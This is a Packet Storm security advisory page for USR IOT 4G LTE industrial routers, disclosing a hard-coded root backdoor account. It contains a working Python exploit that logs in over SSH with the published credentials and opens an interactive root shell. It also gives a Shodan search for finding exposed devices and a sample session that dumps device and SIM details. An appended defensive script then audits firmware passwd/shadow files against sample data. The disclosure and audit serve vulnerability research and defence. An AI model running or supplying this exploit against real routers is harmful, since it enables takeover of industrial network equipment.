USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor

πŸ—“οΈΒ 21 Apr 2022Β 00:00:00Reported byΒ LiquidWorm, zeroscience.mkTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 398Β Views

USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor. The router ships with hard-coded credentials inside its Linux distribution image: the 'usr' account holds the highest privileges on the device, and its password is the default WLAN password 'www.usr.cn'.

Code
```python
#!/usr/bin/env python3
#
#
# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
#
#
# Vendor: Jinan USR IOT Technology Limited
# Product web page: https://www.pusr.com | https://www.usriot.com
# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
#                   1.2.7 (USR-LG220-L)
#
# Summary: USR-G806 is an industrial 4G wireless LTE router which provides
# a solution for users to connect their own devices to the 4G network via WiFi
# interface or Ethernet interface. USR-G806 adopts a high performance embedded
# CPU which can support 580MHz working frequency and can be widely used in
# Smart Grid, Smart Home, public bus and Vending machine for data transmission
# at high speed. USR-G806 supports various functions such as APN card, VPN,
# WIFIDOG, flow control and has many advantages including high reliability,
# simple operation, reasonable price. USR-G806 supports WAN interface, LAN
# interface, WLAN interface, 4G interface. USR-G806 provides various networking
# modes to help users establish their own network.
#
# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
# within its Linux distribution image. These sets of credentials are never
# exposed to the end-user and cannot be changed through any normal operation
# of the device. The 'usr' account with password 'www.usr.cn' has the highest
# privileges on the device. The password is also the default WLAN password.
# Shodan Dork: title:"usr-*" // 4,648 ed ao 15042022
#
# -------------------------------------------------------------------------
# lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14
#
# --Got rewt!
# # id;id root;pwd
# uid=0(usr) gid=0(usr)
# uid=2(root) gid=2(root) groups=2(root)
# /root
# # crontab -l
# */2 * * * * /etc/ltedial
# */20 * * * * /etc/init.d/Net_4G_Check.sh
# */15 * * * * /etc/test_log.sh
# */120 * * * * /etc/pddns/pddns_start.sh start &
# 44 4 * * * /etc/init.d/sysreboot.sh &
# */5 * * * * ps | grep "/usr/sbin/ntpd" && /etc/init.d/sysntpd stop;
# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
# cat /tmp/usrlte_info
# Local time is Fri Apr 15 05:38:56 2022
# (loop)
# IMEI Number:8*************1
# Operator information:********Telecom
# signal intensity:normal(20)
#
# Software version number:E*****************G
# SIM Card CIMI number:4*************7
# SIM Card number:8******************6
# Short message service center number:"+8**********1"
# system information:4G Mode
# PDP protocol:"IPV4V6"
# CREG:register
# Check ME password:READY
# base station information:"4**D","7*****B"
# cat /tmp/usrlte_info_imsi
# 4*************7
# # exit
#
# lqwrm@metalgear:~$
# -------------------------------------------------------------------------
#
# Tested on: GNU/Linux 3.10.14 (mips)
#            OpenWrt/Linaro GCC 4.8-2014.04
#            Ralink SoC MT7628 PCIe RC mode
#            BusyBox v1.22.1
#            uhttpd
#            Lua
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2022-5705
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
#
#
# 10.04.2022
#


import paramiko as bah
import sys as baaaaaah

bnr='''
▄• ▄▌.▄▄ · ▄▄▄ ▪ ▄▄▄▄▄
█▪██▌▐█ ▀. ▀▄ █·██ ▪ •██
█▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄ ▐█.▪
▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌·
▄▄▄▄· ▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀ ▄▄▄
▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪ ▪ ▀▄ █·
▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄ ▄█▀▄ ▐▀▀▄
██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌
·▀▀▀▀ ▀ ▀ ▄▄▄▀ ·▀ ▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀ ▀
▀▄ █·▪ ▪ •██
▐▀▀▄ ▄█▀▄ ▄█▀▄ ▐█.▪
▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌·
▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ ·
▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀.
▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄
▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█
▀ ▀ ·▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀▀
'''
print(bnr)

if len(baaaaaah.argv)<2:
    print('--Gief me an IP.')
    exit(0)

adrs=baaaaaah.argv[1]
unme='usr'
pwrd='www.usr.cn'

rsh=bah.SSHClient()
rsh.set_missing_host_key_policy(bah.AutoAddPolicy())
try:
    rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.
    print('--Got rewt!')
except:
    print('--Backdoor removed.')
    exit(-1)

while True:
    cmnd=input('# ')
    if cmnd=='exit':
        rsh.exec_command('exit')
        break
    stdin,stdout,stderr = rsh.exec_command(cmnd)
    print(stdout.read().decode().strip())

rsh.close()
```
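The weakness the advisory describes, credentials baked into the firmware image that the owner can neither see nor change, is something a defender can check for offline before a device ever goes on the network. The script below is an added example written for this page; it is not part of the Packet Storm advisory or of LiquidWorm's PoC. It audits the `/etc/passwd` and `/etc/shadow` taken from an extracted rootfs: it flags any UID 0 account other than `root` (the advisory's `id` output shows `uid=0(usr)` while `root` is UID 2), flags a `root` that is not UID 0, reports empty password fields, and tests every active hash against a short list of vendor defaults that includes `www.usr.cn`. It assumes the image uses `$1$` md5crypt hashes, which it implements in pure Python so it runs on any Python 3 without the removed `crypt` module; other schemes are reported as unchecked rather than silently passed. The passwd and shadow contents, the salts and the root password are constructed sample data, not the firmware's real files.

```python
"""Offline audit of passwd/shadow from an extracted firmware rootfs (added example)."""
import hashlib

# Vendor defaults to test; 'www.usr.cn' is the one the advisory documents.
DEFAULT_PASSWORDS = ["www.usr.cn", "admin", "root"]
_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(v, n):
    # crypt(3)-style base64: n characters, least significant 6 bits first
    return "".join(_ITOA64[(v >> (6 * k)) & 0x3F] for k in range(n))


def md5crypt(password, salt):
    """Pure-Python $1$ (md5crypt), so the audit needs no crypt(3) module."""
    pw, magic, salt_b = password.encode(), b"$1$", salt.encode()[:8]
    ctx = hashlib.md5(pw + magic + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    pl = len(pw)
    while pl > 0:  # mix in alt, one byte per password byte
        ctx.update(alt[:min(16, pl)])
        pl -= 16
    i = len(pw)
    while i:  # the classic bit-pattern quirk of md5crypt
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):  # 1000-round stretching
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(salt_b)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    f = final
    enc = (_to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
           + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
           + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
           + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
           + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
           + _to64(f[11], 2))
    return (magic + salt_b).decode() + "$" + enc


def password_matches(shadow_hash, candidate):
    """True when candidate hashes to shadow_hash; only $1$ is implemented."""
    parts = shadow_hash.split("$")
    if len(parts) == 4 and parts[1] == "1":
        return md5crypt(candidate, parts[2]) == shadow_hash
    return False


def audit(passwd_text, shadow_text):
    """Return a list of human-readable findings for passwd/shadow contents."""
    findings, shadow = [], {}
    for line in shadow_text.splitlines():
        if line and not line.startswith("#"):
            name, hsh = line.split(":")[:2]
            shadow[name] = hsh
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if not line or line.startswith("#") or len(fields) < 7:
            continue
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        if uid == 0 and name != "root":
            findings.append(f"{name}: UID 0 account other than root (shell {shell})")
        if name == "root" and uid != 0:
            findings.append(f"root: account named root is not UID 0 (UID {uid})")
        hsh = shadow.get(name, fields[1])
        if hsh == "":
            findings.append(f"{name}: empty password field, login needs no password")
        elif hsh.startswith(("!", "*")):
            continue  # locked account, nothing to test
        elif not hsh.startswith("$1$"):
            findings.append(f"{name}: hash scheme not covered by this audit, check manually")
        else:
            for pw in DEFAULT_PASSWORDS:
                if password_matches(hsh, pw):
                    findings.append(f"{name}: password matches known default '{pw}'")
                    break
    return findings


# Constructed sample files (not the real firmware): 'usr' holds UID 0 and the
# default WLAN password while 'root' is demoted to UID 2, mirroring the
# advisory's `id` output. Salts and the root password are made up.
SAMPLE_PASSWD = """\
root:x:2:2:root:/root:/bin/ash
usr:x:0:0:usr:/root:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
"""
SAMPLE_SHADOW = (
    "root:" + md5crypt("constructed-root-pw", "abcd1234") + ":0:0:99999:7:::\n"
    "usr:" + md5crypt("www.usr.cn", "zx9Qpl2m") + ":0:0:99999:7:::\n"
    "nobody:*:0:0:99999:7:::\n"
)

if __name__ == "__main__":
    for finding in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(finding)
```

Run against a real extraction, the two sample strings would be replaced by the contents of `squashfs-root/etc/passwd` and `squashfs-root/etc/shadow`. The audit deliberately refuses to guess about hash schemes it does not implement, so a `$5$` or `$6$` entry shows up as a finding to check by hand instead of disappearing as a false negative, and the same goes for a second UID 0 account whose password happens not to be on the default list: the UID finding still fires even when the password check does not.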
